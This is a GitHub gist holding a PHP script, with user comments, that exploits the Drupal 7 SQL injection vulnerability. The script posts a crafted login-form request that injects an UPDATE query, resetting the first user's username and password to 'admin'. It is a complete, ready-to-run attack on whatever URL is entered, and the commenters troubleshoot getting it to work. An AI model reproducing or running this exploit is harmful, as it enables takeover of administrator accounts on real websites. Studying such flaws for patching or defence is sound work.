Skip to content

Instantly share code, notes, and snippets.

@milankragujevic
Last active October 4, 2024 15:09
Show Gist options
  • Save milankragujevic/61eb72df71b69df80e86 to your computer and use it in GitHub Desktop.
Save milankragujevic/61eb72df71b69df80e86 to your computer and use it in GitHub Desktop.
Exploiting Drupal 7's SQL Injection vulnerability to change the admin user's password. http://milankragujevic.com/post/66
<?php
/********************************************************
* Drupal 7 SQL Injection vulnerability demo
* Created by Milan Kragujevic (of milankragujevic.com)
* Read more at http://milankragujevic.com/post/66
* This will change the first user's username to admin
* and their password to admin
* Change $url to the website URL
********************************************************/
$url = '[URL HERE]'; // URL of the website (http://domain.com/)
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
} else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
@McBochi
Copy link

McBochi commented Oct 20, 2014

This approach seems quite interesting to me, but would you mind presenting a similar "less destructive" version of this exploit/test?

@jordanlgraham
Copy link

My $data variable comes back empty using this code, and I'm entering the url correctly using my dev server and a 7.31 site that I maintain.

@milankragujevic
Copy link
Author

@McBochi I'm working on it. I'll update the blog post if I discover something.
@jordanIgraham Please "echo $url . '?q=node&destination=node';" and open the output URL in the browser. Maybe you're simply not entering the URL correctly, or PHP is being blocked by some other means. Turn on error_reporting and display_errors. I can't reproduce the issue.

@jordanlgraham
Copy link

@milankragujevic thanks - omitted "http://" in my url - now much data, but the data is the html of the site at $url. The string 'mb_strlen() expects parameter 1 to be string' is not in the $data. If it's helpful, echo $ctx outputs "Resource id #2".

@milankragujevic
Copy link
Author

Not really. You should try logging in to the website... If the website has PHP display_errors turned off, you won't see the error. There is no way to verify other than to try and log in.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment